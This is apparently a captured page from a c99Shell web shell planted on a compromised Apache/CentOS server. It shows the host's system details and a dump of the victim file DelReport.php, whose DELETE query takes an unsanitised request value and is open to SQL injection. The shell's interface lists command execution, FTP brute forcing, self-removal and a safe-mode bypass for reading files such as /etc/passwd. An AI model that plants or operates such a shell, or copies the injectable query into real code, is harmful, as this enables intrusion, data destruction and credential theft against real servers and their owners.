110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Qa_depart/ drwxr-xr-x Free 52.62 GB of 127.8 GB (41.17%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Qa_depart/ drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: DelReport.php (761 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/manage/Qa_depart/DelReport.php
Size	761 B
MD5	f5bc6503b0ec0aff8ad98b8e760b3473
Owner/Group	apache/apache
Perms	-rw-r--r--
Create time	03/07/2013 18:31:17
Access time	11/07/2024 14:53:54
MODIFY time	15/07/2010 00:09:28

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8

3C 3F 70 68 70 0D 0A 0D 0A 3F 3E 0D 0A 3C 68 74 6D 6C 3E 0D 0A 3C 68 65
61 64 3E 0D 0A 3C 74 69 74 6C 65 3E 44 65 6C 65 74 65 20 20 44 61 74 61
20 43 6F 6D 70 6C 65 74 65 20 3C 2F 74 69 74 6C 65 3E 0D 0A 3C 6D 65 74
61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 43 6F 6E 74 65 6E 74 2D 54 79
70 65 22 20 63 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20
63 68 61 72 73 65 74 3D 77 69 6E 64 6F 77 73 2D 38 37 34 22 3E 3C 2F 68
65 61 64 3E 0D 0A 3C 62 6F 64 79 20 62 67 63 6F 6C 6F 72 3D 22 23 46 46
46 46 46 46 22 3E 0D 0A 3C 3F 70 68 70 0D 0A 09 69 6E 63 6C 75 64 65 28
22 2E 2E 2F 69 6E 63 6C 75 64 65 2F 46 75 6E 63 74 69 6F 6E 44 42 2E 70
68 70 22 29 3B 0D 0A 09 43 6F 6E 6E 65 63 74 44 42 28 29 3B 0D 0A 20 20
20 20 20 20 20 20 20 24 73 71 6C 20 3D 20 22 44 45 4C 45 54 45 20 46 52
4F 4D 20 20 71 61 5F 71 61 72 65 70 6F 72 74 5F 74 62 20 20 57 68 65 72
65 20 20 52 65 70 6F 72 74 71 61 49 64 3D 27 24 52 65 70 6F 72 74 71 61
49 64 27 20 20 22 3B 0D 0A 09 09 24 72 65 73 75 6C 74 20 20 3D 20 6D 79
73 71 6C 5F 71 75 65 72 79 28 20 24 73 71 6C 29 3B 0D 0A 09 09 69 66 20
28 21 24 72 65 73 75 6C 74 29 0D 0A 09 09 09 72 65 74 75 72 6E 20 22 20
50 6C 65 61 73 65 20 63 68 65 63 6B 20 51 75 65 72 79 20 41 67 61 69 6E
20 3C 62 72 3E 22 3B 0D 0A 20 20 20 20 20 20 20 20 20 69 66 20 28 24 72
65 73 75 6C 74 29 0D 0A 09 09 65 63 68 6F 20 22 3C 6D 65 74 61 20 68 74
74 70 2D 65 71 75 69 76 3D 5C 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 5C
22 20 63 6F 6E 74 65 6E 74 3D 5C 22 74 65 78 74 2F 68 74 6D 6C 3B 20 63
68 61 72 73 65 74 3D 77 69 6E 64 6F 77 73 2D 38 37 34 5C 22 20 2F 3E 22
3B 0D 0A 09 09 09 09 65 63 68 6F 20 22 3C 73 63 72 69 70 74 3E 61 6C 65
72 74 28 27 BA D1 B9 B7 D6 A1 A2 E9 CD C1 D9 C5 E0 C3 D5 C2 BA C3 E9 CD
C2 E1 C5 E9 C7 27 29 3B 3C 2F 73 63 72 69 70 74 3E 22 3B 0D 0A 09 09 09
09 65 63 68 6F 20 22 3C 73 63 72 69 70 74 3E 77 69 6E 64 6F 77 2E 6F 70
65 6E 65 72 2E 64 6F 63 75 6D 65 6E 74 2E 61 6C 6C 2E 6D 79 46 6F 72 6D
3B 20 77 69 6E 64 6F 77 2E 6F 70 65 6E 65 72 2E 6C 6F 63 61 74 69 6F 6E
2E 72 65 6C 6F 61 64 28 29 3B 20 77 69 6E 64 6F 77 2E 63 6C 6F 73 65 28
29 3B 3C 2F 73 63 72 69 70 74 3E 22 3B 0D 0A 09 09 09 09 65 78 69 74 28
29 3B 0D 0A 09 43 6C 6F 73 65 44 42 28 29 3B 0D 0A 3F 3E 0D 0A 3C 2F 62
6F 64 79 3E 0D 0A 3C 2F 68 74 6D 6C 3E 0D 0A 0D 0A

<?php    ?>  <html>  <he
ad>  <title>Delete  Data
Complete </title>  <met
a http-equiv="Content-Ty
pe" content="text/html;
charset=windows-874"></h
ead>  <body bgcolor="#FF
FFFF">  <?php   include(
"../include/FunctionDB.p
hp");   ConnectDB();
       $sql = "DELETE FR
OM  qa_qareport_tb  Wher
e  ReportqaId='$Reportqa
Id'  ";   $result  = my
sql_query( $sql);   if
(!$result)   return "
Please check Query Again
<br>";           if ($r
esult)   echo "<meta ht
tp-equiv=\"Content-Type\
" content=\"text/html; c
harset=windows-874\" />"
;   echo "<script>ale
rt('єС№·ЦЎўйНБЩЕаГХВєГйН
ВбЕйЗ');</script>";
echo "<script>window.op
ener.document.all.myForm
; window.opener.location
.reload(); window.close(
);</script>";   exit(
);   CloseDB();  ?>  </b
ody>  </html>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--